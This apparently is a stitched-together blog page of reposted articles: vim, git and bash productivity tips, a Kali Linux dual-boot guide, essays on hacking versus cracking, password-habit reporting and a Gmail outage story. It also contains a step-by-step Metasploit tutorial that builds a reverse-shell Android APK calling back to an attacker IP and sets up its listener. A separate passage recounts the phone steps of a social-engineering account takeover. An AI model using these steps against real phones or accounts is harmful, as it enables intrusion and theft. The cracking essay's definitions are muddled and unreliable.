Unix hacking for fun and learning.

In our workflow we am always looking for ways to be more productive, and to have more fun while developing. There’s nothing quite like the feeling of flying through a sequence of commands in bash that you know would take your peers twice as long to execute. Have you ever :

• Raged silently at a coworker for spamming the left arrow key to get to the beginning of their terminal prompt when they could have just pressed CTRL + A ?
• Watched someone as they enter the same command over and over when they could have just prefaced it with ! ?
• Rolled your eyes as your buddy expounds at length on the virtues of IDEs when you know that you could “roflstomp” him or her using vim ?

If so, then these tips might be for you.
DISCLAIMER: There’s an admitted bias towards vim, git, and the terminal here. we don’t intend to start a holy war about terminal vs. IDEs, just have some fun and point out these fun tricks that work well for me.

git add -p

If you’ve worked with git for any non-trivial amount of time you hopefully have come across the notion of making atomic commits. Essentially, the notion is that a commit should contain only interrelated details, and not anything that’s logically unrelated to the things you are committing. For example, it makes sense to commit changes to a class and its corresponding unit test in one commit, but if you’ve made changes to another class that deal with completely different business logic then those should be in another commit.
However, what happens when you are working within one file that contains multiple unrelated changes, or changes that you’d like to split up into more than one commit in case you need to revert them separately? Or you have sprinkled logging statements all over the file that you don’t want to commit to the repo? The normal sequence of git commands that people use fails us here:

$ git diff
diff --git a/some-file.c b/some-file.c
index f383179..09e4e35 100644
--- a/some-file.c
+++ b/some-file.c
@@ -2,6 +2,8 @@

 int main(void) {
        printf("doing some stuff\n");
-       printf("doing some more stuff\n");
+       do_some_stuff();
+       printf("doing some unrelated stuff\n");
+       do_some_unrelated_stuff();
        return 0;
 }
$ git add some-file.c
$ git commit
[master 1938906] some unrelated stuff, cramming it all in one commit 'cause I'm lazy
 1 file changed, 3 insertions(+), 1 deletion(-)
$ echo "Whoops we just committed unrelated stuff.  Not very modular of us."

The -p (standing for patch) flag for git add is ridiculously useful for these kinds of cases. This tells git add that we want to do a partial add of the file, and we’re presented with a nice interative menu which allows us to specify with a lovely amount of detail exactly which parts of the file we want to stage. git splits the changes into hunks automatically, which you can approve or reject with y or n respectively, or use s to split up into finer grained hunks. If git can’t split the hunks up the way you want automatically, you can specify as much detail as you want with the e (edit) option.

And now our commits are nice and tidy.

See here for more details on git add -p
EDIT: Some commenters have pointed out that this usage of -p flag also works for commands such as git checkout --. Therefore you could hypothetically send only part of a file back to the way it was at HEAD, and keep your other changes. Handy!

vim’s CTRL-P / CTRL-N autocomplete feature

This is one of those killer features of vim that we are surprised to find out people (even experienced vim gurus) don’t use more frequently. Even if you are a casual user (hop into vim to edit some config files while sshed into a box) it has the potential to help you out quite a bit. One of the reasons people claim they couldn’t live without IDEs is the existence of features such as Intellisense that provide autocompletion of variable/function names. These features are very nice since they cut down on mistakes due to misspelling properties and thereby speed up the compile/run/debug cycle a fair bit. Many people don’t seem to realize that there is an analog which comes straight out of the box in vim, no plugins needed.
You can press CTRL-N to move down the list of suggested completions when typing in INSERT mode (which vim draws from the current buffers, and from the tags file if you have one), or CTRL-P to move back up (representing “NEXT” and “PREVIOUS” if you didn’t catch the mnemonic). If there is only one possible completion, vim will just go ahead and insert it. Very handy and speedy, especially in codebases with a lot of long variable / method / constant names.
CTRL-P/CTRL-N have a lot of synergy with the next tip as well, as touched upon briefly in the above paragraph.

And you barely need to leave the home row.

exuberant ctags

Everyone who uses vim knows that it can be a bit of a kerfluffle sometimes to open a file in a distant directory (tab completion helps ease this with :e, but it’s still not usually instantaneous). If you happen to be working on a team, or a very large project, the ability to do this quickly will likely be a vital part of your workflow.
Exuberant Ctags is a tool that makes this worlds easier than it would be without. With ctags, you can you just run a command in the top directory of the project you’re working on to generate a “tags” file, then you can use CTRL-] to “pop into” the definition of whatever it is your cursor is over (say, a class name). Press CTRL+T to get back to where you were before.
You can even set up a post-commit hook in git to generate your ctags file automatically when you make a commit! Nice.

CTRL-R in bash and zsh

Ever been typing in a command at the terminal, when you suddenly find yourself wishing that there was an easy way to just autofill the prompt with something that you’d entered previously so you can edit it or just run it again? If so, then I’ve got good news for you: You can! Just press CTRL+R and start typing the thing that you are looking for. The terminal will fill in what it thinks you are looking for, and if there is more than one option you can cycle through them by pressing CTRL+R repeatedly. When you’ve found the thing you’re after, you can break out of the prompt with any of the usual movement commands (CTRL+A, CTRL+E, arrow keys, etc. if you have standard bash keybindings). Try it out! Very handy if you can’t remember the name of the box you want to ssh into.

What was that IP address again?

history | grep $COMMAND will treat you well too, if you just want to review all of the times you’ve run that command in recent times.

vim macros

A lot of the time when you’re writing code, or doing related tasks, you find yourself in need of a way to repeat the same editor commands over and over, perhaps with a slight variation. Different editors provide slightly different ways of addressing this. Sublime Text, for example, has a “killer feature” where you are able to place multiple cursors in various locations and edit away. In vim (and in emacs too, but here we’ll be covering the vim method) you record and playback keyboard macros to accomplish this. It is a tool with an absurd amount of power and flexibility, and offers the chance to speed up productivity on repetitive editing tasks by an order of magnitude.
To make a macro, press q in normal mode, then press another key to “name” the macro (usually we use q again). vim will start recording your keystrokes. vim will remember which keystrokes you make until you press q again to save the macro. You can replay with @-letter in normal mode, so we are usually pressing @q. You can also preface the @/replay command with a number so that you can rapidly execute your macro over and over (like much in vim-land, the “grammar” behaves as you would be accustomed to). If you’re accustomed to using vim’s fancy movement commands (for instance, using / search to navigate), and practice a little bit, you will soon be able to whip up thunderous macros that will leave your mouse-dependent colleagues in the dust.

Hacking Android Smartphone Tutorial using Metasploit software on unix using Kali Linux

Nowadays mobile users are increasing day by day, the security threat is also increasing together with the growth of its users. Our tutorial for today is how to Hacking Android Smartphone Tutorial using Metasploit. Why we choose android phone for this tutorial? simply because lately android phone growing very fast worldwide. Here in China you can get android phone for only US$ 30 it's one of the reason why android growing fast.

What is android? according to wikipedia:
Android is an operating system based on the Linux kernel, and designed primarily for touchscreen mobile devices such as smartphones and tablet computers. Initially developed by Android, Inc., which Google backed financially and later bought in 2005, Android was unveiled in 2007 along with the founding of the Open Handset Alliance: a consortium of hardware, software, and telecommunication companies devoted to advancing open standards for mobile devices.
and what is APK? according to wikipedia:

Android application package file (APK) is the file format used to distribute and install application software and middleware onto Google's Android operating system; very similar to an MSI package in Windows or a Deb package in Debian-based operating systems like Ubuntu.

Here is some initial information for this tutorial:
Attacker IP address: 192.168.8.94
Attacker port to receive connection: 443
Requirements:
1. Metasploit framework (we use Kali Linux 1.0.6 in this tutorial)
2. Android smartphone (we use HTC One android 4.4 KitKat)

Step by Step Hacking Android Smartphone Tutorial using Metasploit:

1. Open terminal (CTRL + ALT + T) view tutorial how to create linux keyboard shortcut.
2. We will utilize Metasploit payload framework to create exploit for this tutorial.

msfpayload android/meterpreter/reverse_tcp LHOST=<attacker_ip_address> LPORT=<port_to_receive_connection>

As described above that attacker IP address is 192.168.8.94, below is our screenshot when executed the command

3. Because our payload is reverse_tcp where attacker expect the victim to connect back to attacker machine, attacker needs to set up the handler to handle incoming connections to the port already specified above. Type msfconsole to go to Metasploit console.

Info:

use exploit/multi/handler –> we will use Metasploit handler
set payload android/meterpreter/reverse_tcp –> make sure the payload is the same with step 2

4. The next step we need to configure the switch for the Metasploit payload we already specified in step 3.

Info:

set lhost 192.168.8.94 –> attacker IP address
set lport 443 –> port to listen the reverse connection
exploit –> start to listen incoming connection

5. Attacker already have the APK's file and now he will start distribute it (I don't need to describe how to distribute this file, internet is the good place for distribution ).
6. Short stories the victim (me myself) download the malicious APK's file and install it. After victim open the application, attacker Metasploit console get something like this:

7. It's mean that attacker already inside the victim android smartphone and he can do everything with victim phone.
Conclusion:
1. Don't install APK's from the unknown source.
2. If you really want to install APK's from unknown source, make sure you can view, read and examine the source code. The picture below is the source code of our malicious APK's in this tutorial.

Share this post if you found it useful
Courtsey: hacking-tutorial.com

Kali Linux Dual Boot with Windows

Installing Kali alongside a Windows installation can be quite useful. However, you need to exercise caution during the setup process. First, make sure that you’ve backed up any important data on your Windows installation. Since you’ll be modifying your hard drive, you’ll want to store this backup on external media. Once you’ve completed the backup, we recommend you peruse Kali Linux Hard Disk Install, which explains the normal procedure for a basic Kali install.
In our example, we will be installing Kali Linux alongside an installation of Windows 7, which is currently taking up 100% of the disk space in our computer. We will start by resizing our current Windows partition to occupy less space and then proceed to install Kali Linux in the newly-created empty partition.

Download Kali Linux and either burn the ISO to DVD, or prepare a USB stick with Kali linux Live as the installation medium. If you do not have a DVD or USB port on your computer, check out the Kali Linux Network Install. Ensure you have:

• Minimum of 8 GB free disk space on Windows
• CD-DVD / USB boot support

Preparing for the Installation

1. Download Kali Linux.
2. Burn The Kali Linux ISO to DVD or copy Kali Linux Live to USB.
3. Ensure that your computer is set to boot from CD / USB in your BIOS.

Dual Boot Installation Procedure

1. To start your installation, boot with your chosen installation medium. You should be greeted with the Kali Boot screen. Select Live, and you should be booted into the Kali Linux default desktop.
2. Now launch the gparted program. We’ll use gparted to shrink the existing Windows partition to give us enough room to install Kali Linux.
   
   
3. Select your Windows partition. Depending on your system, it will usually be the second, larger partition. In our example, there are two partitions; the first is the System Recovery partition, and Windows is actually installed in /dev/sda2. Resize your Windows partition and leave enough space (8GB minimum) for the Kali installation.
   
   
4. Once you have resized your Windows partition, ensure you “Apply All Operations” on the hard disk. Exit gparted and reboot.
   
   

Kali Linux Installation Procedure

1. The installation procedure from this point onwards is similar to a Kali Linux Hard Disk install, until the point of the partitioning, where you need to select “Guided – use the largest continuous free space” that you created earlier with gparted.
   
   

Once the installation is done, reboot. You should be greeted with a GRUB boot menu, which will allow you to boot either into Kali or Windows.

Post Installation

Now that you’ve completed installing Kali Linux, it’s time to customize your system. The Kali General Use section of our site has more information and you can also find tips on how to get the most out of Kali in our User Forums.

Courtsey: docs.kali.org

What is actually hacking? Don't worry, we will tell you.

The other day, a junior of mine was narrating to a group how he hacked into a friend's Facebook profile. Great, I thought. Kids nowadays are turning out to be pretty smart. However, his emphasis was on what he did (about a lame ass chat with a lame ass girl) rather than how he did it. Turns out his friend had left his account open, and he just happened to be there. The meme here says it all.

That is not hacking. Hacking is something completely different. A more popular story comes to my mind. Last year, the digital life of a Wired.com writer, Mat Honan, was completely destroyed by hackers (note that he was targeted just because they liked his three letter Twitter handle). The hacker, who contacted him later, calling himself Phobia, got a link to his personal website, which mentioned his Gmail address. They attempted a Google account recovery, which showed the alternate email address as m••••n@me.com.

The me.com email was associated with his Apple Account. Phobia got his billing address from a whois search on his personal domain. Getting the the credit card number was a bit tricky though. But not tricky enough.

First you call up Amazon and add a Credit Card to your account. All you need is a name, an email and a billing address. After that, you call them again and say you lost access to your account. On providing the name, billing address and the bogus credit card you added in your last call, Amazon allows you to add a new email address to your account. Viola! You have access to the Amazon account.

Next, with the actual credit card number, billing address and name, you call Apple Care and get the account reset. With the access to the Apple ID, you get access to the me.com ID, and then Gmail, and then whatever else is connected. The hackers erased all the information in his iPhone and Mac Book. Mat Honan managed to get everything back though, here's the story in his own words.

Let me tell you another one. Indian born Cornell University student Debarghya Das was requested by his friends to get the results of CICSE a day before they were launched. He studied the poorly written JavaScript in the page and generated a script to extract all the results (which were public surprisingly!) He has described the process in a Quora post. What he did after extracting the results is to analyse them and the  results were shocking. I would not stress on his conclusions but rather his process. Although, newspapers claimed he 'hacked' into the ICSE system, it was a result of simple web scraping.

These two contrasting stories bring me to my very point. Who is a hacker? Simply put, hackers are doers.

Source: http://on.fb.me/1aWkQpz

As the inforgraphic suggests, hacking doesn't necessarily mean searching for vulnerabilities in a computer system and taking advantage of those. A hacker is simply a computer enthusiast, who loves solving problems. Not just mathematical problems, but real life problems.

The common man, though, has a great misconception. The term hacker in generally associated with something which we fondly call crackers. A cracker is someone who seeks and exploits weaknesses in a computer system or network. Modern media is to blame, who have continuously confused the public with the use of the term hacker for the term cracker! Take for instance, the ruckus they created when Debarghya Das scraped the CICSE results. Newspapers like The Daily Mail, The Hindustan Times and The Times of India claimed that he 'hacked' into the system when it was a case of simple web scraping of publicly available data.

Then, there are personalities like Ankit Fadia are fooling the public with their hacking courses- you can't possibly hack into Gmail or Facebook by pressing a button or with one click. In fact, all those stories you hear are caused by the ignorance of the people, just like Mat Honan suggested. He says had he put a two step authentication in Gmail, his hack could never have progressed.

That being said, how do (read) crackers break into computer systems and networks? It's all about finding the right pattern in the labyrinth of data, which we call noise! You have just got to look hard enough, and you would definitely find the required pattern- and once you do, breaking in is a piece of cake.

In one of the TED talks last year, Angad Nadkarni, a self proclaimed hacker talks about hacking in general and how he 'hacked' into the Indian education system to save students from the noise of education in India- ranging from reference books to coaching institutions. Well, he was right in terms of the use of the term 'hacking' for sure. He named his application Examify.

What the application does is pretty simple. It takes in a large volume of question papers and analyses them to tell you what to study and what not to study. How does the application do it? Well, as it goes through the given data set, it assigns probabilities to different topics. That means the larger the data set, the more accurate the prediction.

It's basically a classic example of supervised machine learning, and more precisely a case of binary classification. Binary Classification involves classifying the members of a given set of objects into two groups based on whether they have some property or not. The process involves feeding the system a data set of past information so that it is able to predict with a certain amount of probability of the category or group of any new data.

In the case of Examify, the binary groups would be whether a question/topic would be asked in the next exam or not. Theoretically, we can go up to an infinite number of properties, but in general, we generally stick with a more humane number.

Examify is an example of how true hackers work. I would like to conclude with a quote by Rasmus Lerdorf, the creator of PHP.

I actually hate programming, but I love solving problems! And programming is an unfortunate way of solving the said problems...

Courtsey: http://theblogbowl.in

Hacking and Cracking?

Hacking, and cracking. Two different forms of Internet and computer related privacy and copyright breaches, usually malicious. I'll be discussing the differences between hacking, and cracking. They are two completely different things, but people usually get confused between the two, they both end with a similar sound, or 'acking' (that's probably why!) and they're both malicious forms of cyber activity. I'll be talking about the difference between hacking, and cracking. 

• Let's start off by explaining what the words mean, in computer vocabulary - that is. Hacking, is the act of stealing personal or private data, without the owner's knowledge or consent, it could also include other things like stealing passwords, creating a bot net, or pretty much any act that  breaches someone's privacy, without their knowledge, or consent.

• Now, on to cracking. Cracking is where edit a program's source code, or you could create a program, like a key generator (more commonly known as a 'keygen'), patch, or some sort of application that tricks an application in to thinking that a particular process has occurred. For example, a key generator and a patch for the Adobe Master Collection would trick the software in to thinking that the key entered is correct, and not let it  verify the key with the Adobe master server. Cracking is pretty much looking for a back door in software, and exploiting it for malicious use or for a copyright breaching act.

The difference (if you have not noticed it yet) is that a hacker is someone that uses their extensive knowledge of computer logic and code for malicious purposes, while a cracker - looks for back doors in programs, and exploits those back doors. Cracking is generally less harmful than hacking. Hackers are usually involved with web related hacking, like MySQL interception, or phishing, other forms of hacking would include things like brute force, or password lifting.

       

           Well, the difference is simple. One is more malicious than the other, crackers usually have an extensive knowledge in code related to Python and .NET (Visual Basic, C, C++, C#) and Objective C (Mac), while hackers are fluent in different forms of web code, like PHP, MySQL, Java Script , Ajax, and HTML and CSS. I hope, after reading this, we all have got what the difference between hacking, and cracking are. Basically, it's just what they do, that's the difference. 

Courtsey: http://hackingvscrackingb31.blogspot.in

Do you think setting your password as 'password' is a dumb thing?

Despite the increasing necessity to protect their digital assets, many people continue to share their passwords with friends, family members and even work colleagues.

NEW DELHI: A few weeks ago, the producers of Jimmy Kimmel's show were up to no good. Going around the streets of Los Angeles, they pretended to help people understand how secure their passwords were, by asking them to reveal, well, their password. And believe it or not, a few dummies fell for this piece of mischief and disclosed their passwords on national TV.

Now you'd think you would have known better, but it turns out that most of us are not very different. Lately, a lot has been said about cybersecurity - the private iCloud images of celebrities leaked, the Sony hack that laid bare the private correspondence among movie executives (even the employees' salary), SnapChat pictures which users thought were deleted, along with multiple Facebook and Twitter account hacks. SplashData came out with its annual list of the most common passwords used and the list proves that there are people who still use "123456" and "password" as their passwords (we kid you not!).

"In the wired 21st century, passwords are proliferating at an alarming rate," the firm said in its report. "It's no surprise, then, that users often succumb to password fatigue and commit such security sins as using passwords based on names or words culled from a dictionary, reusing passwords or writing them down on pieces of paper that are left lying around the office."

Despite high-profile data breaches becoming the norm and with 2014 being called the year of cyberhacks and leaks, people are still using passwords that should have been tossed in the bin a long time ago, simply because they don't see themselves as 'hack-worthy'.

Why would anybody hack me?
In the extremely grave context o the recent leaks, there are people who just see it as someone else's problem, because 'why would anyone want to hack them?' Shifani Reffai, a food and lifestyle writer, says she has nothing to lose even if her account does get hacked. "If you're not in the public eye, chances are that no one is actively trying to hack you. That's the reality. Therefore, there is no need to overcomplicate your passwords to the point that it becomes a challenge to remember them or even worse, end up writing them down on paper," she says.

She adds that though she does feel unsafe online, especially since what you share on one platform is synced with another, she'd rather curb her online activity in order to keep some of her privacy, than have complicated passwords that are too hard to remember.

Same password for all accounts easy to remember
Research shows that 16% of passwords matched a person's first name, 14% were patterns on the keyboard, 4% were variations of the word "password", 5% referenced pop-culture, and 4% likely described things nearby to the user when picking a password.

It is of no surprise, then, that the majority of people disclosing their passwords on Jimmy Kimmel's show, chose their birth dates and pet's name as their passwords. Now either you're a genius adept at remembering multiple sets of complex passwords, or you're just using the same basic password combinations for most accounts. There is more than one reason to believe the latter is true.

Kriti Aggarwal, co-founder of an event management firm in the city, says that cyberhacks don't stop her from having the same password for all accounts. "As far as I can remember, I've had the same password for all my accounts and it has also been the simplest and easiest to remember. The type of privacy I'm worried about isn't privacy from the government, marketers, spam or phishers," she explains. "It's privacy from my parents, siblings and colleagues. At most what I can be worried about is if my bank account details get leaked, but I think I am cautious enough when it comes to that. I don't have to worry about some really confidential in formation being leaked, because let's face it, I'm not that important." she says.


Sharing passwords with friends, family and colleagues
Despite the increasing necessity to protect their digital assets, many people continue to share their passwords with friends, family members and even work colleagues. Because according to them, they don't think that there is anything so compromising that they'll regret later.

Research has shown that people have gotten comfortable with sharing more information openly and with more people. "Most of my colleagues know my computer's password in office as someone or the other needs to use it once in a while. I have passwords of the websites I visit saved in my browser but I don't expect my colleagues to go through my personal emails or steal my bank account information because I trust them. Some of my friends have access to my Facebook and Twitter accounts as well because I have nothing to hide from them and hence, there is no need to use a complicated 'strong' password," says Gitika Sharma, a graphic designer.

Facebook, Gmail relatively safer
Facebook lets users have the option to adopt two-factor authentication, but it would be interesting to see just how many people have implemented it. This shows that there is still a wide gap between consumer knowledge and perception.

Gaurav Sharma doesn't think social networking sites such as Facebook and Twitter, and something as simple as checking your emails on Gmail, require a two-level authentication procedure. "Using a strong password does help a lot but the problem is that few of us can remember many such strong passwords. I do change passwords for my accounts, but not very frequently for Facebook and Gmail. I find these relatively safer websites to work on and don't find the need to turn two-factor on," says Gaurav.

So what is a good password?
Experts define a strong password as one that is 'difficult to crack, has combinations of upper and lower-case letters, number and special characters and should be different for each site' - definitely not the word "password". But the news isn't all that bad. Study also shows that even though the list of the most common passwords may be astonishing, the passwords in the list aren't necessarily the same as the most leaked ones.

People are moving away from using such passwords, but the rate is definitely slower than we'd expect.

Courtsey: TOI

Google Gmail users hit by software glitch

The glitch hit people using Gmail and some of Google's apps

Gmail users around the world saw errors and safety warnings over the weekend after Google forgot to update a key part of the messaging software.

Google said a "majority" of users were affected by the short-term software problem.
While people could still access and use Gmail many people saw "unexpected behaviour" because of the problem.
Many reported the errors via Twitter seeking clarification from Google about what had gone wrong.
The error messages started appearing early on 4 April and hit people trying to send email messages from Gmail and some of the firm's messaging apps.
The problems arose because Google had neglected to renew a security certificate for Gmail and its app services. The certificate helps the software establish a secure connection to a destination, so messages can be sent with little fear they will be spied upon.
Google's own in-house security service, called Authority G2, administers the security certificates and other secure software systems for the search giant.
Information about the problem was posted to status pages Google maintains for its apps and email services.
In the status message, Google said the problem was "affecting a majority of users" who were seeing error messages. It added that the glitch could cause programs to act in "unexpected" ways.
The problem was resolved about two hours after it was first noticed.
The glitch comes soon after Google started refusing security certificates issued by the China Internet Network Information Center (CNNIC). Google said a security lapse by the CNNIC meant the certificates could no longer be trusted. CNNIC called the decision "unacceptable and unintelligible".